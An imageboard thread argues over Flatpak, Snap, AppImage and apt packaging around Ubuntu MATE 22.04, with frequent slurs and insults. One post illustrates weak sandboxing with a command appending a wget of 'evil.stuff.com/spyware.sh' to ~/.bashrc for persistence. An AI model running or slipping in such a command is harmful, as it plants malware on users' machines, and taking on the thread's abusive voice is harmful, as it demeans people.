FLATPAK TAKES OVER; WILL BE IN UBUNTU 22.04 BY DEFAULT

omgubuntu.co.uk/2022/02/ubuntu-mate-22-04-flatpak-support\

Flatpak is the future, bros!

Attached: communityIcon_6eerrix084q41.png (256x256, 36.34K)

Other urls found in this thread:

askubuntu.com/questions/866511/what-are-the-differences-between-snaps-appimage-flatpak-and-others
twitter.com/AnonBabble

better than snaps i guess
i still see nothing wrong with apt + ppa

Not the official one. Mate is retarded anyways, get with the times grandpa.

canonical please deprecate the shitty standard you made and let the superior standard take over i beg you

Attached: pain.jpg (482x427, 74.8K)

Can anyone please explain how flatpak operates?
>do apps run from the archive like appimage?
>does it introduce bloat, like keeping multiple libraries?
>can I delete the original .flatpak file? Is it like a windows setup.exe ?
>why would I prefer flatpak over native installing an app with distro package manager?

Attached: 1642669522453.jpg (610x672, 49.47K)

They're both shit

holy shit, flatpak is fucking terrible
>askubuntu.com/questions/866511/what-are-the-differences-between-snaps-appimage-flatpak-and-others

why don't they all adopt appimage? Seems the lightest, fastest and more sane than the other two

seriously.

Attached: Screenshot_2.png (1034x712, 46.68K)

HOW ABOUT INITWARE?

oh no 200 whole megabytes of shared deduplicated runtime, how is your stinkpad from 1997 is going to cope with this overwhelming bloat. cry more, faggot.

>oh no 200 whole megabytes of shared deduplicated runtime, how is your stinkpad from 1997 is going to cope with this overwhelming bloat. cry more, faggot.

Attached: 1639825659393.jpg (1242x1516, 963.19K)

Flatpak keeps getting faster and appimage is really a bitch to update which is why Flatpak apps are actually getting updated on Flathub and the appimagehub is basically DEAD.

appimage is going to be gone in 5 years, max. nobody wants to make them for their software anymore.

thank God Almighty i dumped this piece of trash ubuntu
never looking back

thanks for conceding your "argument", retard.
this guys gets it, snap has its uses within ubuntu server ecosystem, flatpak for desktop apps, docker/podman for everything else.

>thanks for conceding your "argument", retard.

Attached: 247.png (600x578, 196.54K)

>Flatpak keeps getting faster and appimage is really a bitch to update which is why Flatpak apps are actually getting updated on Flathub and the appimagehub is basically DEAD.
>
>appimage is going to be gone in 5 years, max. nobody wants to make them for their software anymore.
I have to admit this dude is right.

Flatpak apps get updated in anywhere from a few hours to a few days because of how easy they made it for devs to push out updates.

Meanwhile, it's fucking hard to find an appimage for your specific software much less have an update. appimagehub is a ghost town. No joke. Flathub is taking over for a reason.

btw both packaging into flatpak and putting your own repo online is really simple, and their builder tools are polished and easy to use. shit shit just werks.

If flatpack is gonna bundle your libraries anyway (except for a few) you might as well start doing static builds which can reduce size of the resulting flatpack and increase speed.

flatpak supposedly confines proprietary software
honestly though most can just do echo 'wget "evil.stuff.com/spyware.sh"' >> ~/.bashrc and other stuff if they have /home/ access.

Real talk, Discord's flatpak only has access to the picture folder and maybe videos folder, which is a good thing. If used correctly, it can bundle sōyware and cuck it for good, and will just werk for the user.
Every other use case is bloat to speed up releases and ease maintainance.

runtimes are shared and deduplicated, if you install more then one app through flatpak, initial bloat becomes more and more negligible. static linking would take more space unless you plan to install a single app.
i vaguely remember some guy installing all runtimes off flathub and it was like a few gb or so in total, literally nothing compared to an average SSD.

another canonical failure, but thankfully theyre keeping the retard containment zone alive
>i still see nothing wrong with apt + ppa
my condolences, but youre on the right distro